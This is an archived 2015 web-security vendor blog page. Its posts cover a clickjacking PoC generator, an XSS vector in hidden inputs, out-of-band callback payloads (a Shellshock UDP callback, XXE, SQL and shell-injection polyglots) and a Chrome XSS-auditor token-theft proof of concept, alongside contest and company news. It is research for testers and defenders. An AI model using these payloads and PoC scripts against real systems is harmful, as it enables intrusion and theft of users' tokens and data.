Wednesday, December 9, 2015

Burp Clickbandit: A JavaScript based clickjacking PoC generator

Clickjacking vulnerabilities are endemic throughout the web and really quite serious in the right circumstances. Manually crafting a proof of concept attack can mean laborious hours of offset-tweaking, so we've just released Burp Clickbandit, a point-and-click tool for generating clickjacking attacks. When you have found a web page that may be vulnerable to clickjacking, you can use Burp Clickbandit to quickly craft an attack that proves the vulnerability can be successfully exploited. A few related tools already exist, but Burp Clickbandit has an array of features that hopefully make it stand out:
  • Supports multi-click attacks
  • Written in pure JavaScript, and trivial to deploy
  • Supports transparency, clearly showing the attack mechanics
  • Works on most websites!
As of today's Burp release, you can grab a copy of Clickbandit from within Burp, via the Burp menu. To deploy it, install it as a bookmarklet or simply paste it into your browser's developer console. It works by detecting the HTML elements you click and using their dimensions and position to generate the relevant click area. If the click lands in an iframe or Flash object, it instead uses the x and y coordinates of the mouse and zooms into the object to provide the click area, because in that case the DOM element is the entire frame and so its position would be incorrect.
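The alignment arithmetic behind this can be sketched independently of the DOM. This is a simplified model, not Clickbandit's actual code: given the recorded target's page coordinates and the position of the decoy button, the oversized iframe is shifted so the real target lands exactly under the decoy.

```javascript
// Model of the click-area alignment: compute the offset to apply to the
// iframe so the recorded target point sits underneath the decoy button.
// The coordinates below are illustrative, not taken from a real site.
function iframeOffset(target, decoy) {
    return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// e.g. target button at (340, 520) in the framed page, decoy at (100, 80)
const off = iframeOffset({ x: 340, y: 520 }, { x: 100, y: 80 });
// applying { left: -240, top: -440 } to the iframe aligns the two points
```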

In order to launch multi-click attacks, it's critical to be able to detect when the user has clicked, so you know when to move the iframe to the next click target. To detect clicks cross-domain, we use the blur event on the current window; this fires when you click inside the iframe. We use an onmouseover event on the iframe, together with a flag, to ensure the click happens inside the frame boundary. This isn't perfect, because a right click on the iframe will also trigger the blur event, but there is no way around that due to the same-origin policy. Here is the relevant code snippet:
window.addEventListener("blur", function() {
    if (window.clickbandit.mouseover) {
        setTimeout(function() {
            // register the click and move the iframe to the next click target
        }, 1000);
    }
}, false);
document.getElementById("parentFrame").addEventListener("mouseover", function() {
    window.clickbandit.mouseover = true;
}, false);
document.getElementById("parentFrame").addEventListener("mouseout", function() {
    window.clickbandit.mouseover = false;
}, false);
We use a timeout because the click won’t be accurately detected unless there is a delay, and we also focus a hidden input field after each click to enable multi-click detection since the blur event won’t be fired unless the focus is switched from the iframe to the parent document.
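The event logic above reduces to a small state machine, modeled here outside the browser. This is a sketch: `makeDetector` and its method names are ours, not Clickbandit's.

```javascript
// Model of cross-domain click detection: a blur only counts as a click while
// the pointer is over the iframe, and focus must be returned to the parent
// (the hidden input) before the next click can fire another blur event.
function makeDetector() {
    let mouseover = false, armed = true, clicks = 0;
    return {
        mouseover() { mouseover = true; },   // pointer entered the iframe
        mouseout()  { mouseover = false; },  // pointer left the iframe
        blur() {                             // parent window lost focus
            if (mouseover && armed) { clicks++; armed = false; }
        },
        refocusParent() { armed = true; },   // hidden input focused after a click
        count() { return clicks; }
    };
}

const d = makeDetector();
d.mouseover(); d.blur();   // click inside the frame: counted
d.refocusParent();
d.mouseout(); d.blur();    // blur without mouseover (e.g. tab away): ignored
```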

Using Clickbandit

Record mode

Burp Clickbandit runs in your browser using JavaScript. It works on all modern browsers except for Internet Explorer and Microsoft Edge. To run Clickbandit, use the following steps or refer to the Burp documentation.
  1. In Burp, go to the Burp menu and select "Burp Clickbandit".
  2. On the dialog that opens, click the "Copy Clickbandit to clipboard" button. This will copy the Clickbandit script to your clipboard.
  3. In your browser, visit the web page that you want to test, in the usual way.
  4. In your browser, open the web developer console. This might also be called "developer tools" or "JavaScript console".
  5. Paste the Clickbandit script into the web developer console, and press enter.
The Burp Clickbandit banner will appear at the top of the browser window and the original page will be reloaded within a frame, ready for the attack to be performed. Then simply execute the sequence of clicks you want your victim to perform. If you want to prevent the action being performed during recording, use the "disable click actions" checkbox. When you’ve finished recording, click the "finish" button. This will then display your attack for review.

Review mode

In this view you can adjust the zoom factor using the plus and minus buttons, toggle transparency to see the site underneath the button, and change the iframe position using the arrow keys. Reset restores the original attack, removing any modifications you have made to the zoom factor or position. Click the "save" button to download your proof of concept attack and save it locally. When the clickjacking attack is complete (after the victim has clicked the last link), the message “you’ve been clickjacked” appears; you can alter this message in the code to suit your needs.

You've been clickjacked message

We hope you like the tool; any comments or feedback are welcome. Happy clickjacking! @garethheyes

Monday, November 16, 2015

XSS in Hidden Input Fields

At PortSwigger, we regularly run pre-release builds of Burp Suite against an internal testbed of popular web applications to make sure it's behaving properly. Whilst doing this recently, Liam found a Cross-Site Scripting (XSS) vulnerability in [REDACTED], inside a hidden input element:
<input type="hidden" name="redacted" value="default" injection="xss" />
XSS in hidden inputs is frequently very difficult to exploit because typical JavaScript events like onmouseover and onfocus can't be triggered due to the element being invisible.

I decided to investigate further to see if it was possible to exploit this in a modern browser. I tried a number of approaches, including autofocus and various CSS tricks. Eventually I thought about access keys, and wondered whether the onclick event would fire on the hidden input when it is activated via an access key. It most certainly does on Firefox! This means we can execute an XSS payload inside a hidden attribute, provided we can persuade the victim to press the key combination. On Firefox for Windows/Linux the key combination is ALT+SHIFT+X, and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different value in the accesskey attribute. Here is the vector:
<input type="hidden" accesskey="X" onclick="alert(1)">
This vector isn't ideal because it involves some user interaction, but it's vastly better than expression() which only works on IE<=9.

Note: We've reported this vulnerability to the application's security team. However, they haven't responded in any way after 12 days and a couple of emails. We wanted to make people aware of this particular technique, but we won't be naming the vulnerable application concerned until a patch is available.

This isn't the first time that Burp Scanner has unearthed a vulnerability in an extremely popular web application, and we doubt it will be the last.

Mind those access keys... - @garethheyes

Tuesday, September 15, 2015

Hunting Asynchronous Vulnerabilities

This is a mildly abridged (and less vendor-neutral) writeup of the core technical content from my Hunting Asynchronous Vulnerabilities presentation at 44Con and BSides Manchester. You can watch a recording on YouTube and download the slides here.

In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms, like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions, can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen. Since the release of Burp Collaborator, we have been able to use callback based vulnerability hunting techniques in Burp Scanner. This post details some of the ongoing research I've been doing on callback based vulnerability hunting.

The asynchronous problem

Many asynchronous vulnerabilities are invisible. That is, there's no way to:
  • Trigger error messages
  • Cause differences in application output
  • Cause detectable time delays
This makes them inherently difficult to find. Please note that invisible vulnerabilities should not be confused with 'blind' SQL injection; with blind SQL injection an attacker can typically cause a noticeable time delay or difference in page output.

Invisible vulnerabilities can be roughly grouped into three types:
  • Server-side vulnerabilities in processing that occurs in a background thread, such as a shell command injection in a nightly cronjob or SQLi in a queued transaction. Here, a crafted payload might trigger a time delay, but the delay would only affect a background thread so it wouldn't be detectable. 
  • Blind vulnerabilities that are triggered by a secondary event, such as blind XSS and some second order SQLi. Detection of these issues using normal techniques is possible but often tricky and error-prone.
  • Vulnerabilities where there is no way to cause a difference in application output, and the technology doesn't support anything that can be used to cause a reliable time delay. For example, blind XXE or XPath injection.

The asynchronous solution

Asynchronous vulnerabilities can be found by supplying a payload that triggers a callback - an out-of-band connection from the vulnerable application to an attacker-controlled listener.

For example, the following payload was observed being used to detect servers vulnerable to Shellshock:
() { :;}; echo 1 > /dev/udp/
This payload tries to exploit the Shellshock vulnerability to make the targeted system send a UDP packet to port 53 of an attacker-controlled server. If the attacker receives such a packet, they know the connecting server is vulnerable and can follow up with further exploits.

Many common vulnerability classes can be identified by delivering an exploit that triggers a callback, making it possible to find these vulnerabilities without relying on any application output. Burp Suite uses the Burp Collaborator server as a receiver for these external interactions:

DNS is the ideal protocol for triggering callbacks, as it's rarely filtered outbound on networks and also underpins many other network protocols.

Callback development

Crafting an exploit for a typical vulnerability is an iterative process; based on application feedback an attacker can start with a generic fuzz string and slowly refine it into a working payload. Creating an effective callback-issuing payload can be difficult because callback exploits fail hard - if the exploit fails, you get no indication that the application is vulnerable.

As a result, the quality of callback exploits is crucial - they should work without modification in as many situations as possible. An ideal callback exploit will work regardless of the vulnerable software implementation, underlying operating system, and the context it appears in, and be resistant to common filters.

XML vulnerabilities

A key way to achieve environment insensitivity is to use features of the vulnerability itself to issue the callback. For example, the following XML document uses six different XML vulnerabilities/features to attempt to issue a callback.
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xml" href=""?>
<!DOCTYPE root PUBLIC "-//A/B/EN" "" [
  <!ENTITY % remote SYSTEM "">
  <!ENTITY xxe SYSTEM "">
  %remote;
]>
<root>
  &xxe;
  <x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="" /></x>
  <y xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ " />
</root>
The final two payloads here - XInclude and schemaLocation - are particularly powerful because they don't require complete control over the XML document to work. This means that they can be used to find blind XML Injection, a vulnerability that is otherwise extremely difficult to identify.

SQL Injection

SQL itself doesn't define any statements that we can use to issue a callback, so we'll need to look at each popular SQL database implementation individually.


PostgreSQL

It's easy to trigger a callback from PostgreSQL, provided the database user has sufficient privileges. The copy command can be used to invoke arbitrary shell commands:
copy (select '') to program 'nslookup'
I've used nslookup here because it's available by default on both Windows and *nix systems. Ping is an obvious alternative, but when invoked on Linux it never exits, and thus may hang the executing thread.

MySQL and SQLite3

On Windows, most filesystem functions can be fed a UNC path - a special type of file path that can reference a resource on an external server, and thus triggers a DNS lookup. This means that on Windows almost all file I/O functions can be used to trigger a callback.

SQLite3 has two useful features that can be used to cause a callback via a UNC path:
;attach database '//' as 'z'-- -

(SELECT load_extension('//foo'))
Neither is perfect - the former requires batched queries, and the latter relies on load_extension being enabled.

MySQL has a couple of similar functions, neither of which requires batched queries:
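Two commonly cited examples are `LOAD_FILE` and `SELECT … INTO OUTFILE`, both of which accept UNC paths on Windows. This is a sketch; the hostname is a placeholder:

```sql
-- Reading from a UNC path forces a DNS lookup for the host (placeholder below)
SELECT LOAD_FILE('\\\\attacker.example\\foo');
-- Writing to a UNC path has the same effect
SELECT 'x' INTO OUTFILE '\\\\attacker.example\\foo';
```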



Microsoft SQL Server

Microsoft SQL Server offers quite a few ways to trigger pingbacks:
SELECT * FROM openrowset('SQLNCLI', '';'a',   'select 1 from dual')
(Requires 'ad hoc distributed queries')
EXEC master.dbo.xp_fileexist '\\\\\\foo'
(Requires sysadmin privileges)
BULK INSERT mytable FROM '\\\\$file'
(Requires bulk insert privileges)
EXEC master.dbo.xp_dirtree '\\\\\\foo'
(Ideal - requires sysadmin privileges but checks privileges after DNS lookup)

Oracle SQL

Oracle offers a huge number of ways to trigger a callback: UTL_HTTP, UTL_TCP, UTL_SMTP, UTL_INADDR, UTL_FILE…

If you like, you can use UTL_SMTP to write a SQL injection payload that sends you an email describing the vulnerability when it executes. However, these all require assorted privileges that we might not have.

Fortunately, there's another option. Oracle has built-in XML parsing functionality, which can be invoked by low privilege users. And, yes, recently Khai Tran of NetSPI found that Oracle is vulnerable to XXE Injection. This means that we can chain our SQL injection with an XXE payload to trigger a callback with no privileges:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY %  remote SYSTEM ""> %remote;]>'),'/l')

Write-based callbacks

As you've probably noticed by this point, non-Windows systems are quite a lot harder to trigger callbacks on because the core filesystem APIs don't support UNC paths. However, we may be able to indirectly trigger a callback via a 'write a file' function.

The obvious way to do this is to write a web shell inside the webroot. However, this isn't ideal from an automated scanner's perspective - we don't know where the webroot is so we'd have to spray the filesystem with shells, which clients might not be too happy about.

A less harmful alternative approach is to exploit mailspools / maildrops. Some mailers have a folder where any correctly formatted files will be periodically grabbed and emailed out. This approach looked promising at first, but I couldn't get it to work on any major *nix mailers without root privileges, making it pretty much useless.

There's one other option - we can try to tweak a config file. Although MySQL's SELECT INTO OUTFILE can't be used to overwrite files, MySQL's configuration-loading strategy means we can potentially override options without needing to overwrite an existing file. A file written to $MYSQL_HOME/my.cnf or ~/.my.cnf takes precedence over the global /etc/mysql/my.cnf file. We can trigger a callback when the server is next restarted by overriding the bind-address option with our hostname. There is a slight catch: the server will then try to bind to that interface and probably fail to start. We can mitigate this by answering the DNS lookup with an address that makes the server bind to all available interfaces. However, this causes other issues which are left to the reader's imagination.
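For illustration, the dropped override file might look something like this; a minimal sketch, with a placeholder hostname:

```ini
# Hypothetical ~/.my.cnf written via SELECT ... INTO OUTFILE.
# On the next restart, resolving bind-address triggers the DNS callback.
[mysqld]
bind-address = attacker.example.net
```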

Shell command injection

Triggering a callback when we have arbitrary code execution is really easy. That said, we don't necessarily know what context our string is appearing in, or even what the underlying operating system is. It would be ideal to craft a payload that worked in every plausible context:
bash    : $ command arg1 input arg3
bash "  : $ command arg1 "input" arg3
bash '  : $ command arg1 'input' arg3
win     : > command arg1 input arg3
win  "  : > command arg1 "input" arg3
By creating a test page that executed the supplied string in each of the five contexts, and iteratively tweaking it to improve coverage, I developed the following payload:
bash  : &nslookup'\"`0&nslookup`'
bash ": &nslookup'\"`0&nslookup`'
bash ': &nslookup'\"`0&nslookup`'
win   : &nslookup'\"`0&nslookup`'
win  ": &nslookup'\"`0&nslookup`'

Key: ignored context-breakout dud-statement injected-command ignored

Cross-Site Scripting

As with shell command injection, it's easy to use XSS to trigger a pingback, but we don't know what the syntax surrounding our input will be - we might be landing inside a quoted attribute, or a <script> block, etc. We also don't know which characters may be filtered or encoded.

Gareth Heyes crafted a superb payload to work in most common contexts. First it breaks out of script context and opens an SVG event handler:
Then it breaks out of single-quoted attribute, double-quoted attribute, and single/double quoted JavaScript literal contexts:
After this point everything is executed as JavaScript, so it's just a matter of importing an external JavaScript file, and grabbing a stack trace to help track down the issue afterwards:
Burp Suite will be using this payload as part of its active scanner within the next few months. If you're impatient, check out the Sleepy Puppy blind XSS framework recently released by Netflix.

Asynchronous Exploit Demo

The live demo showed an asynchronous Formula Injection vulnerability being used to exploit users of a fully patched analytics application:

The version of LibreOffice shown in the demo is missing a few security patches and thus vulnerable to CVE-2014-3524. The Microsoft Excel installation is fully patched.


Of the techniques discussed, Burp Suite currently uses all the XML attacks, the shell command injection attack, and the best SQL ones. Blind XSS checks are coming soon. We're excited to see if these techniques root out some vulnerabilities that have been allowed to stay hidden for too long. Hopefully this has also provided a solid rationale for why it's worth deploying your own private Collaborator server if you'd prefer not to use PortSwigger's public one.

Enjoy - @albinowax

Monday, September 7, 2015

T-shirt competition winners

We've just mailed out prizes to the winners of our T-shirt competition.

Below are the 40 entries that won a Burp Suite T-shirt:
  • @0xdeadb - [...] callbacks.setExtensionName("I love Burp Suite because it can be extended for my specific needs"); [...]
  • @7MinSec - I love Burp Suite because I can tell clients "I'm gonna hit you with a cluster bomb & then a pitch fork!" and not get arrested.
  • @JGJones - I love Burp Suite because I can claim my baby daughter is an awesome hacker whenever she burps. Pic: with nethacker
  • @JGamblin - I love Burp Suite because there is nothing like the CFO calling and asking "What is a Burp Suite is and why do we need 8 of them?"
  • @SelsRoger - I love Burp Suite because it allows for repeatable - help I'm being held hostage in an XSS factory- results.
  • @TryCatchHCF - I love Burp Suite because customizing Intruder attack types and positions show me the smoke that leads me to building the fire.
  • @Yabadabaduca - I love Burp Suite because it satisfies my needs better than my husband
  • @benholley - I love Burp Suite because @PortSwigger answers support emails personally. And quickly.
  • @blitzfranklyn - I love Burp Suite because my wife says it makes me look sexy!
  • @c0ncealed - I love Burp Suite because screenshots with: ? Credit Card Data / PII ? Site Secured by $vendor logo ? Burp Suite ...make a report!
  • @c1472b039f12485 - I love Burp Suite because I intercepted this tweet and made it something wittier
  • @crisp0r - I love Burp Suite because Peter Weiner grew up and stopped getting me into awkward conversations
  • @eficker - I love Burp Suite because no matter what horse manure (read obscure) encoding a site happens to use, it always proxy's up in plaintext. <3
  • @gsuberland - I love Burp Suite because SSBsb3ZlIEJ1cnAgU3VpdGUgYmVjYXVzZSBjbVZqZFhKemFXOXVJR2x6SUdaMWJnPT0=
  • @infosecabaret - I love Burp Suite because You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version f
  • @irsdl - I love Burp Suite because of the great minds behind it! because I loved WAHH ;) From WebAppSec lovers 4 WebAppSec lovers!!!
  • @itsec4u - I love Burp Suite because .. it's your Swiss Army knife in the dark realm of AppSec threats !
  • @j34n_d - I love Burp Suite because the repeater, repeater, repeater, repeater, repeater, repeater, repeater, repeater, is so easy to use.
  • @jakx_ - I love Burp Suite because Peter weiner for president! Cc @peterwintrsmith
  • @joshbozarth - I love Burp Suite because it’s better than Burp Sour.
  • @lnxdork - I love Burp Suite, it works with my selenium scripts to make security checking web app updates into a repeatable process!
  • @magnusstubman - I love Burp Suite because
  • @michaelsmyname - I love Burp Suite because bug bounties wouldn't be as fun without it.
  • @mikerod_sd - I love Burp Suite because I can simulate manual testing when I need to go to the doctors...... or recover from a hangover
  • @n0x00 - I love Burp Suite because the sound of whimpering dev's denied 'go live' gives me a semi :D? ... too ... too much ?
  • @n3tjunki3 - . I love Burp Suite because it's like a cheeky Nando's
  • @phillips321 - I love Burp Suite because without it I could not have an 'extended' lunch break, thanks @PortSwigger for the Simulate manual testing feature
  • @pjgmonteiro - I love Burp Suite because my favorite toy when I was younger were LEGO, now is the Burp Suite.
  • @pytharmani - I love Burp Suite because some developers be like "what?? How?? Even with HTTPS??"
  • @righettod - I love Burp Suite because it's like Nutella, once you have try it you cannot use another tool.
  • @schniggie - I love Burp Suite because it's the best web security tool you can get and buy by only pwning one bug. ROI is almost 0day :-)
  • @seanmeals - I love Burp Suite because it's helped me make a killing on bug bounties for a small investment of $300.
  • @sizzop - I love Burp Suite because "><script>alert('pwnd')</script>
  • @strawp - I love §Burp Suite§ §reasons§
  • @thedarkmint - I love Burp Suite because it's the mutant Swiss Army knife of web testing
  • @thegmoo - I love Burp Suite because it's possible to use Repeater to automate extreme participation in this contest
  • @tsmalmbe - I love Burp Suite because it swiggs my ports just right
  • @waptor75 - I love Burp Suite because it's my appsec Swiss Army chainsaw.
  • @ydoow - I love Burp Suite because the price seems even reasonable to tight arse northerners
  • @zebarg - I love Burp Suite because it made a vulgar word acceptable in professional conversations.

Friday, August 28, 2015

Burp Suite training courses

We're very pleased to announce an expanded list of Burp Suite training partners. Whether you are a Burp novice or an expert user, our training partners can offer you hands-on training to help you to get the most out of Burp Suite.

Our training partners offer courses at public events, and all courses can be presented privately on-site at your location.

The new Burp Suite Training page includes details of the different courses that are available, and dates of forthcoming public events where these training courses will be happening. Over time, we'll be adding details of more training partners to provide an even wider range of course options.

Thursday, August 27, 2015

Gartner continues to recognize PortSwigger as a Challenger for Application Security Testing in 2015

On August 6 2015 Gartner released its annual Magic Quadrant for Application Security Testing, with PortSwigger Web Security placed as a Challenger* for the second year, based on its ability to execute and completeness of vision.

In this latest report, analysts Joseph Feiman and Neil MacDonald state that “highly publicized breaches in the last 12 months have raised awareness of the need to identify and remediate vulnerabilities at the application layer”. In addition, that “attackers have increased the sophistication and frequency of their attacks, motivated financially by the theft of monetary assets, intellectual property and sensitive information”.

At PortSwigger we have always believed in pushing the boundaries of web security testing, and we continue to invest heavily in our research and development capabilities to help our users to respond to the rapidly evolving threats they face.

Dafydd Stuttard, founder of PortSwigger Web Security commented:

“Our accelerated investment and ambitious roadmap over the last 12 months have resulted in developments that have fundamentally improved the web scanning functionality that is available to our users.

“We released Burp Collaborator in April of this year, which has the potential to revolutionize web security testing. Over time, Burp Collaborator will enable Burp to detect issues like blind XSS, asynchronous code injection, and various as-yet-unclassified vulnerabilities. In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology.

“We have also pioneered research into two completely new types of vulnerability. Over the past 12 months we have released scan checks to find both server-side template injection and PRSSI (path-relative style sheet imports). Burp was the first scanner to detect these two serious vulnerabilities.”

Stuttard goes onto say that he is excited about the next 12 months at PortSwigger. “As one of the most widely adopted web security tools in the marketplace, we have a very large and loyal user community, which we will continue to listen to. That, coupled with our ability to remain agile as a company, allows us to respond rapidly to market developments. We are expecting to release many new exciting features in the coming months.”
*Gartner define Challengers in this magic quadrant as “vendors that have executed consistently, typically by focusing on a single technology (for example, SAST or DAST) or a single delivery model (for example, AST as a service only). In addition, they have demonstrated substantial competitive capabilities against the Leaders in this particular focus area, and also have demonstrated momentum in their customer base in terms of overall size and growth.”

PortSwigger Web Security is a global leader in the creation of software tools for security testing of web applications. For nearly a decade, we have worked at the cutting edge of the web security industry, and our suite of tools is well established as the de facto standard toolkit used by web security professionals.

Gartner disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Wednesday, August 26, 2015

New release cycle for Burp Suite Free Edition

For a long time, we've released updates to Burp Suite Free Edition every year or so, when Burp gets a new major version number. The Professional Edition is updated much more frequently, often a few times per month.

We've decided to change the Free Edition release cycle, for two reasons:
  • From time to time, we apply fixes within Burp to accommodate changes in modern browsers, cryptographic standards, or other developments. It's not good for the Free Edition to lag behind on these kinds of updates.
  • We work continuously on incremental enhancements to Burp, and it is sometimes artificial to pick a particular update out as being a "major" release. We don't want to be incrementing our major version number solely because we're overdue an update of the Free Edition.
Starting today, we will release updates to the Free Edition of Burp much more frequently. Every few versions of the Professional Edition will be accompanied by an update to the Free Edition. Since the majority of updates to the Professional Edition only change features within that edition, such as Burp Scanner, it isn't necessary to update the Free Edition every time. But we will do so periodically whenever changes have been made that apply to both editions.

Of course, the Free Edition of Burp will always continue to remain free of charge, and the frequent updates we make to the Professional Edition will still be made available to licensed users without any additional charge.

Monday, August 17, 2015

Abusing Chrome's XSS auditor to steal tokens

Detecting XSS Auditor

James pointed out to me that XSS auditor in Chrome has a block mode, and I thought it might be interesting to see if this could be exploited in some way. When the HTTP header "X-XSS-Protection: 1; mode=block" is set, XSS auditor removes all content on the page when an XSS attack is detected. I thought I could use this to my advantage: if the target site contained an iframe, I could use the length property of the window to detect whether the iframe was destroyed. In all modern browsers you can use contentWindow.length across domains, as the following code demonstrates.
<iframe onload="alert(this.contentWindow.length)" src="http://somedomain/with_iframe"></iframe>
So if the site has an iframe you will see an alert box with 1, and if not, an alert of 0. If there is more than one iframe, it will alert the number of iframes on the site. Essentially this gives us a true or false condition with which to detect XSS auditor.

Getting a user id

My first thought on how to exploit this was to read a user id from an inline script, by injecting fake XSS vectors and monitoring the length property to see if XSS auditor was active: injecting a series of fake vectors, incrementing the user id each time, until the correct value is detected. The output of the target page would look like this:
<?php header("X-XSS-Protection: 1; mode=block"); ?>
<iframe></iframe>
<script>
uid = 1337;
</script>

As you can see we put the XSS filter in block mode, the page contains an iframe and the script block contains a user id. Here's what the fake vectors look like:
?fakevector=<script>%0auid = 1;%0a
?fakevector=<script>%0auid = 2;%0a
?fakevector=<script>%0auid = 3;%0a
?fakevector=<script>%0auid = 4;%0a
XSS auditor ignores the closing script tag, but the trailing newline is required in order for the XSS to be detected. Here is a simple PoC to extract the uid:
var url = 'http://somedomain/chrome_xss_filter_bruteforce/test.php?x=<script>%0auid = %s;%0a<\/script>',
    amount = 9999, maxNumOfIframes = 1;
for (var i = 0; i < maxNumOfIframes; i++) {
    createIframe(i * (amount / maxNumOfIframes) + 1, (i + 1) * (amount / maxNumOfIframes));
}
function createIframe(min, max) {
    var iframe = document.createElement('iframe'), p = document.createElement('p');
    iframe.title = min;
    iframe.onload = function() {
        if (!this.contentWindow.length) { // page blanked: XSS auditor fired
            p.innerText = 'uid=' + this.title;
            return;
        }
        if (this.title > max) {
            return; // range exhausted without a match
        }
        p.innerText = 'Bruteforcing...' + this.title;
        this.contentWindow.location = url.replace(/%s/, ++this.title) + '&' + (+new Date);
    };
    iframe.src = url.replace(/%s/, iframe.title);
    document.body.appendChild(iframe);
    document.body.appendChild(p);
}
The code creates one iframe (you could create multiple iframes, but in this instance one iframe was faster), uses the onload handler, and checks contentWindow.length; if the uid is found it is displayed, otherwise the code tries the next value by setting the iframe location.

Using windows

If a website uses X-Frame-Options or a CSP policy that prevents the site from being framed, it's still possible to detect XSS auditor using new windows. Unfortunately we can't use the onload event handler on new windows, as this isn't allowed cross-domain for security reasons, but we can get round this by using timeouts/intervals to wait for the page to load. The code looks like this:
var win, timer;
function poc(id) {
 if(!win) {
  win ='http://somedomain/chrome_xss_filter_bruteforce/test.php?x=<script>%0auid = '+id+';%0a<\/script>&'+(+new Date),'');
 } else {
  win.location = 'http://somedomain/chrome_xss_filter_bruteforce/test.php?x=<script>%0auid = '+id+';%0a<\/script>&'+(+new Date);
 }
 timer = setInterval(function() {
  try {
   if(win && !win.length) {
    clearInterval(timer);
    alert('uid='+id);
   } else {
    clearInterval(timer);
    poc(id+1);
   }
  } catch(e) {}
 }, 20);
}
<a href="#" onclick="poc(1)">PoC</a>
The first check determines whether we already have a window; if not, it creates one and stores a reference to it in a global variable. We then use a 20 millisecond interval to repeatedly check whether the XSS detection has happened; if not, the function is called again with the next id.

Stealing tokens

So far the techniques presented are cool but a bit lame, since they are quite restrictive in the data they can retrieve and require the script blocks to be formed in a certain way. Eduardo Vela suggested that I use a form action and an existing parameter to pad the filter. I created a PoC that successfully extracts a 32-character hash from a form action!

The page requires an iframe, block mode and a filtered parameter that appears before the token you want to extract. It looks like this:
<?php
session_start();
header("X-XSS-Protection: 1; mode=block");
if(!isset($_SESSION['token'])) {
 $token = md5(time());
 $_SESSION['token'] = $token;
} else {
 $token = $_SESSION['token'];
}
?>
<iframe></iframe>
<form action="testurl.php?x=<?php echo htmlentities($_GET['x'])?>&token=<?php echo $token?>"></form>
<?php echo $token?>
The "x" parameter is used to pad the XSS filter's match to one character short of its maximum match length, so that the next character of the token falls just inside the match. As each character of the token is detected, we reduce the padding accordingly and scan for the next one. There is a complication: zeros are ignored by the XSS Auditor, which means our string wouldn't be matched and we can't detect zeros directly. The way round this is to inject every character except zero; if no character is detected after going through the entire hex character set, the character must be a zero. This works perfectly well unless two zeros are adjacent. In that instance, I check whether there have been more than two rounds of failed checks - if so, there must be two zeros, so I remove two characters of the detected token and push in two zeros.

Here is the PoC code:
<div id="x"></div>
function poc(){
 var iframe = document.createElement('iframe'),
  padding = '1234567891234567891234567891234567891234567891234567891234567891234567'.split(''),
  token = "a".split(''),
  tokenLen = 32, its = 0,
  url = 'http://somedomain/chrome_xss_filter_bruteforce/form.php?x=%s&fakeparam=%3Cform%20action=%22testurl.php?x=%s2&token=%s3', last, repeated = 0;
 iframe.src = url.replace(/%s/,padding.join('')).replace(/%s2/,padding.join('')).replace(/%s3/,token.join(''));
 iframe.width = 700;
 iframe.height = 500;
 iframe.onload = function() {
  if(token.length === tokenLen+1) {
   alert('The token is:'+token.slice(0,-1).join(''));
   document.getElementById('x').innerText = document.getElementById('x').innerText.slice(0,-1);
   return false;
  }
  if(this.contentWindow.length) {
   // The page loaded normally: the current guess didn't match
   its++;
   if(its > 20) {
    // Every non-zero hex character failed, so this character must be '0'
    token[token.length-1] = '0';
    its = 0;
    repeated++;
   } else if(repeated > 2) {
    // More than two failed rounds: two adjacent zeros
    repeated = 0;
    its = 0;
    token.splice(-2, 2, '0', '0');
    padding.pop();
    token.push('a');
   } else {
    getNextChar();
   }
   this.contentWindow.location = url.replace(/%s/,padding.join('')).replace(/%s2/,padding.join('')).replace(/%s3/,token.join(''));
  } else {
   // The XSS auditor fired: character confirmed, shrink the padding and move on
   repeated = 0;
   its = 0;
   padding.pop();
   token.push('a');
   this.contentWindow.location = url.replace(/%s/,padding.join('')).replace(/%s2/,padding.join('')).replace(/%s3/,token.join(''));
  }
  document.getElementById('x').innerText = 'Token:'+token.join('');
 };
 function getNextChar() {
  var chr = token[token.length-1];
  if(chr === 'f' && last === 'f') {
   token[token.length-1] = '1';
   last = '1';
   return false;
  } else if(chr === '9' && last === '9') {
   token[token.length-1] = 'a';
   last = 'a';
   return false;
  }
  if(chr >= 'a' && chr < 'f') {
   token[token.length-1] = String.fromCharCode(chr.charCodeAt()+1);
  } else if(chr === 'f') {
   token[token.length-1] = 'f';
  } else if(chr >= '0' && chr < '9') {
   token[token.length-1] = String.fromCharCode(chr.charCodeAt()+1);
  } else if(chr === '9') {
   token[token.length-1] = '9';
  }
  last = chr;
 }
 document.body.appendChild(iframe);
}
poc();
First the padding is injected into the real parameter, then into our fake parameter along with the form action URL, so the token can be checked one character at a time. "its" counts the current iterations: if it exceeds 20, no character is being detected, which means the character must be a zero. If this process repeats more than twice, we have two adjacent zeros.
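The bookkeeping described above can be modelled in a few lines of Python (a simplified sketch of the loop's logic, not the browser code itself; the function names are ours):

```python
NON_ZERO_HEX = "abcdef123456789"  # '0' is excluded: the XSS Auditor ignores it

def next_guess(current):
    """Advance to the next candidate character, cycling a-f then 1-9."""
    i = NON_ZERO_HEX.index(current)
    return NON_ZERO_HEX[(i + 1) % len(NON_ZERO_HEX)]

def must_be_zero(iterations, limit=20):
    """After every non-zero hex digit has failed, the character must be '0'."""
    return iterations > limit
```

If must_be_zero also fires on the following character more than twice in a row, the attack assumes two adjacent zeros, as described above.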

The final PoC is available here. The flaw has been patched in the latest version of Chrome and the PoC no longer works, but here is a video demonstrating it:

Wednesday, August 5, 2015

Server-Side Template Injection

